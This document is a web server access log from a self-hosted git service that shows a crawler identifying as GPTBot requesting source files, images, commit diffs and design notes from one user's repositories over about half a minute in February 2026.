"/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets?display=source" [Client 74.7.227.38] [Length 11562] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets" -[17/Feb/2026:17:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3?display=source" [Client 74.7.227.38] [Length 11092] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:17:10:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip?display=rendered" [Client 74.7.227.38] [Length 10987] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:17:10:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip3" -[17/Feb/2026:17:10:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles?display=source" [Client 74.7.227.38] [Length 11560] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles" -[17/Feb/2026:17:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:17:10:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js?display=rendered" [Client 74.7.227.38] [Length 10975] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:17:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer?display=source" [Client 74.7.227.38] [Length 11541] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer" -[17/Feb/2026:17:10:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh?display=source" [Client 74.7.227.38] [Length 12145] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:17:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol?display=rendered" [Client 74.7.227.38] [Length 18429] [Gzip 3.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:17:10:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog?display=rendered" [Client 74.7.227.38] [Length 84461] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog" -[17/Feb/2026:17:10:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor?display=rendered" [Client 74.7.227.38] [Length 12833] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor" -[17/Feb/2026:17:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=mostissues&state=all" [Client 74.7.227.38] [Length 8494] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=mostissues&state=closed" -[17/Feb/2026:17:10:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13982] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/About.tsx" -[17/Feb/2026:17:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15602] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:17:10:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/project.assets.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/project.assets.json" -[17/Feb/2026:17:10:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/project.assets.json" -[17/Feb/2026:17:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 12127] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json" -[17/Feb/2026:17:10:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png" -[17/Feb/2026:17:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom2.png" -[17/Feb/2026:17:10:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom3.png" -[17/Feb/2026:17:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png" -[17/Feb/2026:17:10:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10898] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png" -[17/Feb/2026:17:10:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10897] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png" -[17/Feb/2026:17:10:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fcontroller.hpp" [Client 74.7.227.38] [Length 21504] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:10:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fitransport.hpp" [Client 74.7.227.38] [Length 25395] [Gzip 4.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:17:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fitransport.hpp" [Client 74.7.227.38] [Length 19350] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/itransport.hpp" -[17/Feb/2026:17:10:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fcontroller.hpp" [Client 74.7.227.38] [Length 24585] [Gzip 4.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:10:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fcpp%2finclude%2fcontroller.hpp" [Client 74.7.227.38] [Length 26252] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/cpp/include/controller.hpp" -[17/Feb/2026:17:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm" [Client 74.7.227.38] [Length 208936] [Gzip 13.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm" -[17/Feb/2026:17:10:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977?files=C%2b%2bProject%2findustrial-comm" [Client 74.7.227.38] [Length 83095] [Gzip 12.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm" -[17/Feb/2026:17:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm" [Client 74.7.227.38] [Length 145303] [Gzip 14.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm" -[17/Feb/2026:17:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:10:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11425] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11425] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:10:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:10:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:10:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11398] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:10:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11425] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main.cpp?display=source" [Client 74.7.227.38] [Length 11423] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:10:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10946] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:10:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main.cpp?display=rendered" [Client 74.7.227.38] [Length 10972] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main.cpp" -[17/Feb/2026:17:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176781] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp.md" -[17/Feb/2026:17:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp.md?display=source" [Client 74.7.227.38] [Length 481648] [Gzip 11.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp.md" -[17/Feb/2026:17:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176814] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp.md" -[17/Feb/2026:17:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23940] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/controller-cpp2.md" -[17/Feb/2026:17:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176816] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp.md" -[17/Feb/2026:17:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23943] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/controller-cpp2.md" -[17/Feb/2026:17:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp2.md?display=source" [Client 74.7.227.38] [Length 56394] [Gzip 9.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp2.md" -[17/Feb/2026:17:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp2.md?display=rendered" [Client 74.7.227.38] [Length 23911] [Gzip 4.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/controller-cpp2.md" -[17/Feb/2026:17:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md?display=rendered" [Client 74.7.227.38] [Length 176817] [Gzip 4.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp.md" -[17/Feb/2026:17:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10882] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/tsconfig.json" 